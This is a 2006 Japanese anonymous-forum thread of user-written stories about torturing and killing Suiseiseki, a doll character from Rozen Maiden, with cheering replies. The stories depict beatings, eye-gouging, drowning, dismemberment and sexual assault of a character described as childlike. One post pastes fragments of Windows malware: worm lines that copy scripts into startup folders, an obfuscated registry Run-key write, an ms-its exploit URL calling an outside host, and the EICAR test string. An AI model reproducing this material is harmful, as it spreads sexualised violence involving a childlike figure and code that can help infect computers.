僕は鋏を投げ、再び金属バッドを掴むと翠星石の頭を、身体を、とにかく全身を殴り始めた。
「ぐ…ぎゃぁあぁあっ!!や‥めろ‥ですぅ!いゃぁっ!」
泣き叫ぶ翠星石を見て今までの征服感が一気に最高潮に達し、満足した僕は『次で最後だ!』と言うと、翠星石の首を締め始めた。
「げ…げっほ…や‥め‥げほぉっ!!」
翠星石は白目をむき、動かなくなった。
僕は、なお虐待を続けようと翠星石のゼンマイを巻き、無理矢理動かそうとする。だが、翠星石は全く動かない。いくらやっても。
僕は翠星石が死んだみたいなもんだと理解すると本気で壊れて一人で大笑いした。『壊れたか?ジャンクになったのか?おい翠星石、ぐゎはははははは!!』
僕は取りあえず、動かなくなった翠星石の身体をバラバラにすると、それぞれをバラバラに捨てた。

終わり。

かなり意味不明&悲惨だな。空気読まずにいきなりこんなの書いてスマソ

119 :名無しかわいいよ名無し:2006/01/29(日) 13:06:04 ID:giLIibav
まぁ良いんじゃない?
基本コミカル、たまに真性ないじめネタで

そしてAAが1番和むわ〜

120 :名無しかわいいよ名無し:2006/01/29(日) 13:53:48 ID:on0C1YC7
結構よかった、にやにやしながら読ませてもらったよありがとう。

121 :名無しかわいいよ名無し:2006/01/29(日) 14:58:50 ID:QejjKlKy
>>109
デュード乙

122 :名無しかわいいよ名無し:2006/01/29(日) 15:31:36 ID:lVIxcCT0
>>118よかったよ、ありがとう

123 :名無しかわいいよ名無し:2006/01/30(月) 13:11:18 ID:TlziVHVa
>>118
よかったよ
こちらは思いつかないからコピペ改変


おまえたち人格障害者の見ている目の前で、
ク ソ 翠 星 石 を 極 熱 の 糞 尿 で ゆ で 殺 し て や る 。
存在自体が誤りであるにもかかわらず、
「翠星石はなんにも悪いことしてないですぅ〜」と吠え続けるクソ翠星石。
数日経過して体組織もほとんど糞尿に融解し、もはや原形を留めないクソ翠星石。
その状態でなお許しを請うこともせず、自我を主張し続けるクソ翠星石。
その醜悪な姿と腐り切った自我とを目の当たりにして、
今までクソ翠星石を崇めていた己自身の所業の愚かさを思い知るが良い。

124 :名無しかわいいよ名無し:2006/01/31(火) 02:16:46 ID:zrr1MHNn
 ○<" ̄\ 。  。    
。 ゚.o |____) 。。 
 。ヽ∬*‘e‘) /<コウシテヤルデスゥ… 
。  (::.     )。 。
   |l |ノノイハ)) 。。
   |∩#゚听ノ∩。
  (      .::)
""⌒⌒⌒"⌒⌒""⌒⌒⌒"⌒⌒

125 :名無しかわいいよ名無し:2006/02/01(水) 03:23:18 ID:VkoStOii
さあ、今夜もやってきたぜデュードターイム!

今日のメインディッシュは翠星石!こいつを斧と毒で料理だ!
まずはその綺麗な足!ッグシャ!
「きゃああああ!やめて!もうやめてですぅ!」
まだまだいくぜい!手首切断!ッグキョ!
「いやあああ!お願いですぅ!なんでも言うこと聞きますぅ!」
何か言ったか〜?言ってねえよなあ。次は注射器いくぜ!
ほらブスリと!どんどん入っていくぜ!オラ、全部注入完了!どうなるかなあ〜
「・・・うう・・・うヴぉえええ!・・・ぶぶべべヴぇヴぇばば・・・」
汚え!変なもん出しやがった。グロいんだよボケ!
頭にキーック!さらにキーック!そして胴体切断!シュビーン!
そして小便フィニーッシュ!
「はぁはぁ・・・これからどうするつもりですか・・・」
ん〜そうだなあ、久々に溜まってるからチ○ポ加えてもらうかぁ。
ほーら銜えろ。
「う・・んん・・・んんうう」
おお、こいつは結構イケるぜ〜!うう、たまんねえ!
ブチ撒けるぞ!ほらブピュルルル!
「っぶは、汚い!やめて!これ以上出さないでですぅ!」
わかったよ、ガソリンフィニッシュな!ほらぶっかけてシュボ!
また明日頼むぜ〜

126 :名無しかわいいよ名無し:2006/02/01(水) 14:32:17 ID://2Bho6/
翠星石を虐待するには何がいいかって?

…アニメ第二期終了後の状態こそ翠星石にとって一番の虐待状態だと思う。
つうか、拷問状態…。

127 :名無しかわいいよ名無し:2006/02/01(水) 15:34:48 ID:ppuWAL9i
このスレ最高だぜ!げへへっ!

128 :名無しかわいいよ名無し:2006/02/01(水) 16:43:54 ID:MQZlxhN/
なんでみんなここにレスするときは頭悪い言葉遣いするんだ?w

129 :名無しかわいいよ名無し:2006/02/01(水) 16:58:03 ID:VkoStOii
昼間は虐待する気にならねえが、今日は嫌な一日だぜ。
女房に逃げられるわ、家はなくなってるわで・・・ほんといい一日だぜ。
また翠星石虐待するかあ。
いや、今日は虐待じゃ済まさねえ、虐殺でいくぜ、イエイ!

130 :名無しかわいいよ名無し:2006/02/01(水) 17:29:41 ID:4i6298Ss
>129
デュードさ〜ん
浣腸の時間ですよ〜

131 :名無しかわいいよ名無し:2006/02/01(水) 18:54:15 ID:h0ePxo76

〜翠星石虐殺小説第2期〜

日がゆっくりと上る頃、
翠星石は憂欝になりながらも重い身体を引きずりだした。
〜今日もまた痛い目にあうと覚悟しながら。
どこかに隠れてようと隠れる場所を考えていると、部屋の扉が勢い良く開き、翠星石がもっとも怖れていた人物が入ってきた。
「ち…チビ人間…!!」
『あ?誰がチビだとぉ?」人間はそういうと翠星石に近づいた。

「くっ…来るなですぅ!」翠星石はあわてて人間の動きを止めようと近くにある物を人間めがけて投げ出した。
人間はそれを軽々と避け、ギロッと翠星石を睨み付けた。
翠星石はそれにビクッと身体を硬直させ、震えだした。
『お前、誰に向かって物投げてんだよ?』
尚更人間を怒らせてしまった。

人間は翠星石のもとへ歩き、どんどん翠星石との距離を縮めていく。

もはや翠星石にもう抵抗はできなかった。
人間は翠星石の髪を掴みあげると翠星石の身体が浮く。
「痛っ…痛いですぅ!!お願い離して‥」
『はぁ!?聞こえね〜よ!マジで何言ってっか聞こえねぇ!あははは!!』

人間は翠星石の願いに耳も傾けず、髪を掴んだまま翠星石を振り回した。
「いやぁ!!痛いですぅ!!どうかなりそうですぅ〜やめてですぅ〜やめてぇ〜!!」
さすがに髪を引っ張られる痛みには耐えられないのか翠星石はひたすら叫んだ。
『うるせぇんだよ!自分で種まいたくせにガーガー騒ぎやがって!!どうかなるならなっちまえよ!お前みたいな生意気なヤツいじめるのってマジ楽しいんだけど!簡単にやめるわけねぇじゃん!』

132 :名無しかわいいよ名無し:2006/02/01(水) 18:55:13 ID:h0ePxo76

人間はそう言うと、翠星石を振り回す速度を速める。
「ーッ…に…人間!!やめやがれですぅ!お前は本当に…頭おかしいです…っ!病院に行きやがれですぅ〜〜!!」

『僕の頭がおかしいだって?フン!お前ほどじゃねぇよ!このバカ石!!』
人間は笑いながら翠星石を罵倒する。
「やめろと言ったらやめやがれですぅ!わかんねぇのか!こんチクショーヤローですぅ〜〜!!」
翠星石は無駄だとわかっていても、つい、いつものように毒舌で言い返した。
『お前はまだ自分におかれた状況がわかってねぇみたいだな!』
人間はそう言うと、翠星石を壁に投げ付けた。

「きゃあっ!痛…ぁいですぅ…乱暴なヤロゥ‥ですね!!」
『相変わらず身のほど知らずのバカだな!お前は!まぁ、そんなお前だからこそいじめがいがあるんだがな!ゲハハハ!』
人間は翠星石のもとへ歩み寄ると、倒れてうずくまっている翠星石の腹を思いっきり蹴り上げた。
「ぅげ!…ぇほ…っ何を‥!?」
反論しようとする翠星石を無視し、何度も腹を蹴る。「げぇ…っ!ぅっ!いやぁ‥やめて‥ぅぐっ!!」
部屋中にドスドスと蹴る音や翠星石の咳き込んだ悲鳴、人間の怒鳴り声が響く。
ぐったりと意識が薄れかかってうずくまっている翠星石を見て、腹を蹴る事に飽きた人間は目を閉じた翠星石の顔を蹴りだした。


133 :名無しかわいいよ名無し:2006/02/01(水) 18:56:01 ID:h0ePxo76

その衝撃で、翠星石は一気に意識がはっきりと戻った。
「ぃだっ!…ですぅ!!顔が変になる…ですぅ〜!!ぅぐっ!」
翠星石はあまりの激痛に言葉にならない声をあげながら涙を流した。
『はんっ!何を言うか!!お前の顔は元々から変なんだよ!バーカ!キキキッ』翠星石の顔は一気に変形した。
それをみて人間は大爆笑する。翠星石はそんな人間を見ながらも、かなりの屈辱感に耐えていた。

『そうだ!お前の顔のその片方色が違う目!右の緑の目も左の赤い目のように真っ赤な目に変えてやるよ!』
人間は指の長い爪で翠星石の右の緑の目を刺した。
「ぅぎぃあぁあぁあ!!やめろぉですぅ!痛すぎるですっ!ぃやぁ〜〜〜!!」翠星石は激しく悶えた。
いつもの苦しみや痛みとははるかに違う、目を刺された激痛を越えた痛み。
翠星石はひたすら泣き叫ぶしかなかった。
人間は悪魔のように、ひたすら苦しむ翠星石を笑いながら見下している。
『なんだよぉ!やっぱり人形だな!血なんか出やしない!しゃべったり動いたり食ったりするくせによぉ!残念だな!』
翠星石は反論する気力もなくなった。
その時、人間は何を思いついたのか、翠星石の髪をつかみ、風呂場まで引きずった。
冬場の風呂場。氷のように冷たくなっている湯槽に翠星石を投げ入れた。
傷口がしみる痛みとお湯の冷たさに翠星石は絶叫した。
「ぎゃあぁぁあぁあ!!!冷た…っ!!痛いですぅ〜〜〜!!!!」
人間は嘲笑い、必死に這い上がって来ようとする翠星石を近くにあった掻き混ぜ棒で沈めようと押しつけた。押して押し込み、ばたばたと暴れる翠星石を楽しそうに観覧する。

134 :名無しかわいいよ名無し:2006/02/01(水) 18:57:14 ID:h0ePxo76

『無駄だ無駄だ!!今のお前には何もできまい!ゲハハハ!!』
人間の言う通り、翠星石は冷たいお湯の中で必死に掻き混ぜ棒を避けようとするが、無駄だった。
人間はひたすら爆笑しながら翠星石を押して押し込み、見下している。

「げぼっ‥ごぼ…っ‥…がばごぼ…‥ぉ‥っ!!」

しばらく押し込んでいると、翠星石は完全に動かなくなった。

〜何で私だけがこんな目に…たったあんな口論だけで…〜

そんな思いを残しながら…

終。


第2段書いてみたんだが…相変わらずショボい駄文でスマソ…
またいつか書きたいな。

135 :名無しかわいいよ名無し:2006/02/01(水) 18:58:48 ID:MQZlxhN/
長文wwwwwwwww

136 :名無しかわいいよ名無し:2006/02/01(水) 19:10:05 ID:h0ePxo76
長文でスマソ…

137 :名無しかわいいよ名無し:2006/02/01(水) 19:13:02 ID:MQZlxhN/
いや乙でした。

138 :名無しかわいいよ名無し:2006/02/01(水) 19:18:55 ID:ppuWAL9i
いい気分だ。スッキリした

139 :名無しかわいいよ名無し:2006/02/01(水) 20:21:16 ID:rGx8oOMB
そいつは突然俺の家にやってきた。
翠星石とか言うわけのわからない人形が鞄に入ってやってきたのだ。
そしてこう言うのだった。
「お前は今日から私のマスターになるのですぅ。どうも頼りない馬鹿そうな人間ですが、仕方ないですぅ」
「なに?おい!俺のどこが馬鹿だと?」
初対面でそんなことを言われて黙っていられるわけがない。俺のストレスメーターは70まで上昇した。
「きゃあ!近寄るなですぅ!」
少し歩み寄ろうとしただけで翠星石は部屋から逃げていってしまった。
俺は馬鹿らしくて追いかける気も起きなかった。それよりもこの時間は俺のパソコンライフの時間だ。
人形に構っている暇なんてない。
俺はすぐさまパソコンを起動させる。
いつものようにゲームに熱中する俺。と、そこへ「人間、ドアを開けてですぅ」
おい、なんなんだ!こっちは今いいところだってのに!無視だ無視!
すると今度は行動が激しくなった。
「開けろと言ってるですぅ!開けないとドアを壊すですよ!」
ドンドンとドアを殴ったり蹴ったりする音が聞こえてくる。
「あーもう五月蝿い!開けるから待て!」
ドアを開けるなり、翠星石が部屋に飛び込んできた。そして俺の脛を思いっきり蹴るのだった。
「いってぇ!何するんだよクソ人形!殺すぞ!」
「すぐにドアを開けないからですぅ」
何なんだ!俺のゲームの時間を邪魔した上、言うこと聞いてやったらキックされるなんて。俺のストレスメーターは80に上昇した。
 それからしばらくして翠星石は俺のことをまじまじと見つめたり、ゲームを観察したりしていた。
なんだかんだいって俺には気があるらしい。
「人間、椅子が無いから膝の上に座らせるですぅ」
「は?邪魔だっつうの。第一、ゲーム見えないじゃん。俺現在司令官やってんだから、負けるわけにはいかないんだよ」
「そんなことしったこっちゃないです」
そう言って翠星石は俺の膝の上に無理矢理よじ登ってきた。そのままプレイを続けたが、ゲームの内容は酷い有様だった。
味方の陣地に誤爆してしまったのだ。おかげで司令官解任、さらにはサーバーからバン(追い出される)されてしまった。
それもこれもこいつのせいだ!この人形、妙にいい匂いするし、感触いいし・・・!
とりあえず気分をすっきりさせるために風呂にでも入ってこよう。
俺は翠星石を抱きかかえて床に下ろした。

140 :名無しかわいいよ名無し:2006/02/01(水) 20:44:55 ID:rGx8oOMB
風呂から上がった俺は、服を着ながらいつもの楽しみである風呂上りのヨーグルトの一気飲みのことを考えていた。
暑く火照った喉に流れ込む冷たいヨーグルトのことを考えただけで、ニヤけてしまった。
そして服を着終わった俺は冷蔵庫を開ける。ついにきたぜ!ヨーグルトちゃん!
「・・・え?」
そこには信じられない光景があった。
ない!間違いなくそこに置いてあったはずのヨーグルトがなかったのだ!
「オーマイガーーーーット!!!ちょっとちょっと、嘘でしょ!嘘でしょ!?」
俺はもう泣きそうな気分だった。なんでよ?牛乳屋さんちゃんと持ってきたじゃん。マジありえねえよ!「まさか・・・あいつか!!!」
翠星石だ。クソ人形め!俺のストレスメーターは98に達した。
と、2階の俺の部屋と思われる位置からガシャン!と音がした。
「今度は何をした?何をしたんだよお!」
急いで部屋に駆け戻った。ドアを開けるとそこには、人形がなぜか増えていた。そして・・・
「あー!俺の1/700大和のマストが!○○○のポスターが!」
「あーそれ雛が描いたのー、えへへ上手いでしょ。」
「ふざけるな!翠星石!こいつらを追い出せ!」
「そんなことでいちいち騒ぐなですぅ。陰気な趣味脱するチャンスですぅ」
俺はもう一体の人形を見いやった。
「どうも、翠星石がお世話になっています。妹の蒼星石です」
こんな時に自己紹介か?あ?空気読めよ馬鹿妹!
「はいはいわかったから今日は二人とも帰ってくれ」
俺は強引に二人を帰らせると、物置から釘バットを取ってきて部屋に戻った。

141 :名無しかわいいよ名無し:2006/02/01(水) 20:55:21 ID:rGx8oOMB
俺のストレスメーターはすでに爆発している。
「まったく、こんなことでいちいち騒ぐんじゃ・・・っきゃあ!」
翠星石の腹に思いっきりパンチを食らわせてやった。
そしてぐったりする翠星石を釘バットで猛打しまくる。
「きゃ!痛いですぅ!やめやがれですぅ!」
「ふざけんな!ヨーグルトの分がまだ残ってるんだぜ!」
「ヨーグルト飲んだくらいでごちゃごちゃ五月蝿いですぅ!」
この期に及んでまだ自分の罪を認めないのか!
俺は服を引き裂いて下着だけにしてやった。
「ひい!この変態!」
「人形ごときの裸見たって嬉しくもなんともねえよ!」
おら!直に痛みを味わえ!
どのくらい殴っただろうか。100回近く殴った気がする。
「う、っひぐ・・・どうしてそんなに殴るですかぁ・・・」
翠星石は涙をぼろぼろ流しながら問うのだった。
だがまだ怒りはおさまらない。破壊された模型と破られたポスターの分の恨みが残っている。
「まだ終わってねえ」
翠星石の下着を剥いで、尻を露出させた。
「いや、そんなところ見るなですぅ!」
「うっせえ!そして尻の穴らしき部分にバットを突っ込んでぐりぐりとほじくってやった。」
「ああ!痛い!痛いですぅ!やめてですぅ!あ・・・ああぁん

少し感じたのか喘ぎが漏れた。
「この野郎!妙に感じやがって!」
腹が立ったのでバットを抜くと、もう一度殴打しまくった。
「そしてこれが○○○ちゃんポスターの分だ!」
翠星石の尻の穴に手榴弾を詰め込んだ。ピンには糸をつけ、穴の外からでも抜けるように細工してある。
「へへ、こいつが何かわかるか?俺がこの糸を引けば、お前は木っ端微塵になるんだよ。謝るなら今のうちだ」
すると翠星石は泣きながら
「御免なさい!もうしないですぅ!でも私は大好きなお前の陰気な部分を取り除きたいからやったんですぅ」
最後の言葉が感に触る!死ね!
俺は糸を引いた。その瞬間、物凄い爆発が起こった。
煙が晴れた後、そこには塵と化した翠星石の無残な姿があった。

第1部完

142 :名無しかわいいよ名無し:2006/02/01(水) 22:30:33 ID:D5J9XUaE
長文の人おもしろいぞ!
この調子で翠星石を虐待しまくってくれ!
漏れたちのストレスを吹き飛ばしてくれ!

143 :名無しかわいいよ名無し:2006/02/01(水) 23:05:24 ID:4i6298Ss
ストレス解消が目的かwwwwwwwwww

144 :名無しかわいいよ名無し:2006/02/02(木) 00:58:17 ID:wlsXilQs
ヤバい
やり過ぎだ

145 :デュード:2006/02/02(木) 01:25:29 ID:ydpAn6/M
ふむ、穴に手榴弾か。こいつは傑作だぜ。
さて、今夜も始めるぜデュードターイム!

家はなくなっちまったが、小屋に翠星石を監禁してあるんだよね。
今日は肉切り包丁と核ミサイル使うぜ!

俺は翠星石を監禁してあるボロ小屋のドアを蹴飛ばした。
鎖に繋がれ、拘束具で体はガチガチだ。
いつもは粋がってる翠星石も、度重なる虐待で、反抗する意欲もない。
「人間!早くこの鎖を外してここから出すです!」
いや、まだ抵抗はするみたいだ。こいつは面白そうだぜ。
いいぜ、鎖を外してやる、ついでに拘束具もな。
俺は翠星石の体に取り付けられた鎖と拘束具を外してやった。
途端に、翠星石は俺の腹に蹴りを食らわせた。
っぐえ!いてえよ!
翠星石は半開きになっているドアから逃げようとする。
だが俺は腕を掴み引き止めた。
「っひ・・・」
お遊びはここまでだぜ〜翠星石〜
「こ、今度は何をしやがつつもりですか・・・」
翠星石の声はひどく怯えており、体も震えていた。
なーに、ちょっと痛い目に合わせて虐殺するだけだよ。

まずは腕だ!ッザクッザク!
「きゃあああああ!やめて!お願いだからやめてくださいですう!」
おいおいもう泣いてるのか?これからだってのに。
美脚にキーック!そして微塵切り!
胴体にキックの山。
「うう、っぐえ!ぐぼえっぐぼえ、うげええええ・・・」
うわ、汚ねえ!ゲロ吐きやがった!何も食ってねえくせに。
とりあえず汚いから服脱げ!
俺は翠星石の服を切り裂いた。下着も脱がしてすっぽんぽんだぜ。
っへっへっへ、口は立派だが体は子供だな。
「な、なに見てるですか!」
顔を赤くして座り込む翠星石。
ああ、その格好ならもう出て行っていいよ。サヨナラ翠星石。
ッドガ!またまた腹に一発食らったぜ。まあいい。あいつは今から死ぬんだからね。
数分経って、翠星石は町から離れた砂漠地帯まで逃げていた。
「ふう、ここまで来れば追ってこれないですぅ。早く蒼星石達に会いたいですぅ」
そんな希望を打ち消してやるのが俺の仕事だ。
俺はというと、翠星石の姿がよく見える崖の上にいた。核ミサイル搭載のロケットランチャーを構えて。
狙いを翠星石に定めて〜よーし行け!核ミサイルは発射された。
どんどん加速して翠星石に向かっていく。
「え?あれは何です?あ、あいつですぅ!逃げるですぅ!」
逃げ切れるはずねーよ(笑)
ミサイルは翠星石に直撃した。途端にキノコ雲が発生する。
今頃は地獄の苦しみだろうなあ。だがまた拾って死に至らしめてやるぜい。
またな、翠星石、Have A Nice Day

To Be Continue

146 :名無しかわいいよ名無し:2006/02/02(木) 02:30:56 ID:igLn2wdt
泣けた。誰かこの感動の秀作を漫画化してくれ

147 :名無しかわいいよ名無し:2006/02/02(木) 02:45:14 ID:nxx3AJtK
手榴弾辺りからお前も死ぬだろと言いたい

148 :デュード:2006/02/02(木) 02:49:01 ID:ydpAn6/M
>>146
翠星石虐待はまだ終わらないぜ。
平日だけじゃなくてウィークエンドもあるからなあ。へっへっへ。

149 :名無しかわいいよ名無し:2006/02/02(木) 04:31:52 ID:vnkQ/l4C
>>148
楽しませてもらってます
いつもありがとう!
そしてまたコピペ改変


翠星石の鞄を粉々に叩き壊してやりたい。
翠星石の分際で何で一人前に鞄で寝るんだよ?
生意気なんだよ。
便所の床に転がって寝くさるのが一番のお似合い。

鞄を失って安眠できなくなった翠星石。
睡眠障害から統合失調症(精神分裂病)を引き起こし、半狂乱になって
中央線快速に飛び込んでバラバラに粉砕されてしまえ。
頭部を車輪に轢き潰されて 眼 球 突 出 を起こした翠星石タン。
あ ご も 外 れ て ブ ラ ブ ラ している翠星石タン。
それでも死ねずに「いたいですぅ〜」、「ジュン助けやがれです!」
「のり〜 」と泣きわめき続ける翠星石タン。オメガカワイイ(ゲラゲラ

150 :名無しかわいいよ名無し:2006/02/02(木) 10:34:54 ID:vj46rOPs
なにこの実装虐待のぱくり
まあ、翠星石もドールの中では真紅と並んで雛苺の次にむかつく性格だけどな

151 :名無しかわいいよ名無し:2006/02/02(木) 12:15:29 ID:POJjZJqQ
「むかつく」という感情を持っても、虐待のしやすさがキャラによって違うことに気づいた。
真紅・水銀燈なんかは最初から自分より立場が1段上だし、金糸雀・特に雛苺は幼すぎて気が引けてしまう。やりづらい。
そういった障壁が無い点において双子辺りがやりやすいんだと思う。
実際、虐待スレがある程度続いている(いた)のって去年の蒼星石虐待スレとこのスレぐらいだろう。

152 :名無しかわいいよ名無し:2006/02/02(木) 13:11:00 ID:JsANI0TE
俺は誰でも虐待できるけど

153 :名無しかわいいよ名無し:2006/02/02(木) 18:20:48 ID:xbdgGed8
おっと、キチガイどもの巣窟に足を踏み入れちまったぜ。
おったまげー
また黙示録かよ。

154 :名無しかわいいよ名無し:2006/02/02(木) 18:45:38 ID:nxx3AJtK
449 :名無したん(;´Д`)ハァハァ :2006/02/01(水) 20:08:53 ID:gs3tyHJs
<body onload=window()>
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
eip = eip + unescape("%u7030%u4300")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

これか?最後足りてないっぽいけど

155 :名無しかわいいよ名無し:2006/02/02(木) 18:47:56 ID:nxx3AJtK
誤爆…どこだよここorz

156 :名無しかわいいよ名無し:2006/02/02(木) 19:29:07 ID:A+ECSE/I
死ね

157 :名無しかわいいよ名無し:2006/02/02(木) 21:41:51 ID:L/o8haOz
あまり暗くないどころか何か笑ってしまうな

158 :名無しかわいいよ名無し:2006/02/02(木) 22:45:39 ID:0zt7h7fB

    r@" ̄~@ヽ                    く/',二二ヽ>
    /ノリliliハiliハ                     |l |ノノイハ)
   ノ从リ ゚ -祷ク                  /)|l )))Д´):∵;'  
   ノ从リiつξ,,,iつハ            /// /⊃l_介」ノ⊃
  ノリ从く,,,,ξ,,,,>リ从          ///|//ノ`ヽノヘ≧
       UU                <∧ミミゝゝ二二>ミ

                   く/二二,'ヽ>
    )))<三>          ((ハイ))|l|
 )))<三>  )))<三>  ';∵:リ`Д(((|l|
   )))<三>         ⊂ヽ|_介_|⊂l  ミ  人
    r@" ̄~@ヽ         ≦ヾヽノ`ヽ≧ ミ< >
    /ノリliliハiliハ           ミ<二二二>   Vl\
   ノ从リ ゚ -刀ソ                  /)丶. \\\
   ノ从とi,,,ξ,,,i ノ                / /   '、__|\\\
  ノリ从く,,,,ξ,,,,>リ从             /|//    '、\ \
       UU                <∧ミミゝゝ   <∧ミミゝゝ

             ‐ ‐ ― ――= =≡≡≡二<三>/',二二ヽ>
             ‐ ‐ ― ――= =≡≡≡二<三> |ノノイハ)
                ‐ ‐ ― ――= =≡≡≡二<三>|l )))ДT):∵;',
            ‐ ‐ ― ――= =≡≡≡二<三>l⊃l_介」ノ⊃
    r@" ̄~@ヽ                      ノ`ヽノヘ≧
    /ノリliliハiliハ                     ミ<二二二>ミ
   ノ从リ ゚ -豚ミ                  /)丶. \
   ノ从とi,,,ξ,,,iつハ               / /   '、__|\
  ノリ从く,,,,ξ,,,,>リ从             /|//    '、\ \
       UU                <∧ミミゝゝ   <∧ミミゝゝ

159 :名無しかわいいよ名無し:2006/02/02(木) 22:46:33 ID:0zt7h7fB
                    .  r―
           _.. ー''''''''''''ー-,、.├ーーi 6HIT!!
      _/゛        r-ト|   |
     ./            ,!  `ゝ、、!  __,,..,  痛いですぅ…
     l            /     `''!二`-冖'^l'|       ._,,,.... -、、
     .,!       _,, ./         `゙''''ーイl_,, -''''"゛   ._,,.. i-゙''i
     .,!  ,i―ー''"゛  ヽ\    .`゙゙゙゙゙ ̄ ̄     .,,,..-'',゙,,.. -←!、
     !.,ノ'、         ゙i.\  ''-..,,,,____________yrメ゙‐''"゛ _.. -―'''';`''i
.r'"゙゙) i、 `' ゝ           i 、\、               ,,..;;ニ>''^^^^''/.,,/
.゙ヽ//  ̄'''''''''!ヽ        i .l, ヽ`''ー、,,,__     .,/""   ._,_ノ-!lニ......,,、
  `l′      ヽ       i..l   ヽ_/ゝ、. ̄ ̄ ̄\._.. ‐'',゙ン-'''''''"゙゙゙゙゛ / フ' ゝ
   ヽ―――、  .ヽ    !   i ゙l  /l;;-、 `'ヽ     ヽ┬″ー二二二二 ト" ,i
           ヽt-ゝ    .l  |  l / l . \        ,i'ソ\ ._、-'''^^^^^゙フ┘/
           // /l;"   l   i  ! | .lt、         ,rゾ  .\ '''''''"''''.l. /
        // /八    .| .l  l ./ . ! l    ._ '.ソ      ゙''''lニ´゙,゙7/'´
        l_|  リ  i   .! /  .l/ / . l .ィ ,..r ソ        │ .゙l'´
          ̄    i   |/  . ! /   !゙'l゙  l'ソ         /゙フ,ヽ
             i  /  .i/゛ ./  |./   | .i-、      /イ   l
              i /  .〃 /   / .il゙.―| ,!  ,,-‐'二/  ヽ―"
                 l′ .〃  l   /  〃 .l゙ | r″ /´ヽ
                /  /!   .|,,..-/ !  l |  .! │'i..,゙゙,/、 .ヽ
                ! 丿i  l゙ .丿 | │ !  l  , /  ̄ ヽ―′
               ̄ !  ン   |  |、 i/ ゙ /

160 :デュード:2006/02/03(金) 00:03:09 ID:gaRbt2Op
どうも俺は翠星石の存在に悩んでいる。
何度殺しても蘇るからだ。
そこでいろいろと調べたんだが、ようやくその謎を突き止めた。
どうやら人口精霊とやらが関係しているようだ。
とりあえず今日の虐待の前にスィドリームを買収、そしてサヨナラしておいた。
ついでに如雨露とやらももらって。
今日も虐待始めるぜフォーーーーー!!!

オラ!起きろ!翠星石!
スコップの先端部分で翠星石の腹を思いっきり突き刺した。
「っぐえ!痛っ!朝っぱらから五月蝿いですぅ!」
おまえ確か人口精霊とやらを持ってたよな。あいつもう戻ってこないよ
「どういうことですか!スィドリーム!」
だから戻ってこねえって言ってるだろ!ついでに如雨露ももらったぜ
「そ、それは!返せですぅ!」
うるせえ!俺はスコップで翠星石を跳ね除けた。
「っきゃ!」
そして転がった翠星石を持ち上げて、顔面をスコップで殴りまくった。
死ね!死ね!ゴミカスになっちまえ!ひっひゃひゃひゃっひゃ!
今肥やしをやるよ。俺は庭師の如雨露に小便を一杯になるまで入れて、翠星石にぶっかけてやった。
「う、うえぇぇぇ!汚い!やめてですぅ!」
元気になるぜ!口癖はこうだったかな?伸びやかにぃ〜健やかにぃ〜げっひゃっひゃっひゃっひゃ!
うわ、汚え!こいつまた吐きやがった。
俺は如雨露の管を折って、鋭くなった先端部分で翠星石の腹を突き刺して、切開した。
「ぎいやあああああ!痛い!痛いですぅ!うぼおおええ!」
そして中身のぐちゃぐちゃを取り出し、めちゃくちゃにしてから捨てた。
「う、うう、ぐぼおえ・・・」
もう終わりかよ、つまんねえ。俺は汚水処理場まで翠星石を蹴飛ばしながら持っていって捨てた。

161 :名無しかわいいよ名無し:2006/02/03(金) 00:24:13 ID:/5LlSGG0
>>158-159
GJ!
翠星石の食らい顔ってなんかかわいいよね(*´д`)ハァハァ

162 :名無しかわいいよ名無し:2006/02/03(金) 00:33:09 ID:/Se0Zy+c
誰か犯す話を作る奴は居ないのか

虐待ばかりで飽きる

163 :名無しかわいいよ名無し:2006/02/03(金) 01:26:00 ID:1kzJoE/s
翠星石の為にエサを用意。
花丸ハンバーグ一個。オレンジジュース(無果汁)2リットル。
ミキサーで混ぜ合わせれば出来上がり。
これを医療用のチューブで鼻の穴から強制給餌。

おいしかった?
あれ、なに怒ってるの?翠星石にくせに。
花丸ハンバーグとジュースを一緒に食べられて楽だったでしょ?
かなえてあげたんだよ。感謝してくれないと困るな。

164 :名無しかわいいよ名無し:2006/02/03(金) 01:56:43 ID:yIhMSVYk
>160
相変わらず極悪非道やねw
健やかにぃ〜のびやかに〜にワロタ

165 :名無しかわいいよ名無し:2006/02/03(金) 02:40:20 ID:z5aFfnN1
>>158
翠星石キャワス
残虐なのは苦手だけどこういうのはかわいいなw

166 :名無しかわいいよ名無し:2006/02/03(金) 02:49:59 ID:ABJCI5vC
デュードいいよ
スカっとする

167 :名無しかわいいよ名無し:2006/02/03(金) 06:15:28 ID:nNZ+BkjR
なぜかPCから見られない
携帯だと見るのが不便だなあ

168 :名無しかわいいよ名無し:2006/02/03(金) 16:58:04 ID:KWFx3ot5
銀虐待する真紅にモエス

169 :名無しかわいいよ名無し:2006/02/03(金) 21:39:35 ID:cxj7vj7s
巻きますか?
巻きませんか?

ある日僕の元に突然いっつうの手紙が届いた。
何のことだかわからなかったが、まぁ面白そうだし巻きますに丸をつけておいた。
これが僕と翠星石の出会いだった。


「いってきます。」
「いってらっしゃいですぅ」
僕は翠星石の可愛らしい声を聞くといつもどおり学校へ行った。
学校にいても僕は授業なんてそっちのけでずっと翠星石のことばっかり考えていた。
あいつは突然届いた謎の呪い人形・・・
だが容姿はとても可愛らしく喋るし動く。
僕がそんな翠星石を恋愛対象へともっていくまでにはそう時間はかからなかった。

帰り道、僕はまだ翠星石のことばかり考えていた。
思春期なせいか翠星石のやらしいところも想像してしまう。
「はぁ・・・」
そうため息をつくと知らないうちについていた自分の家の玄関の鍵を開ける。
「ただいまぁ。」
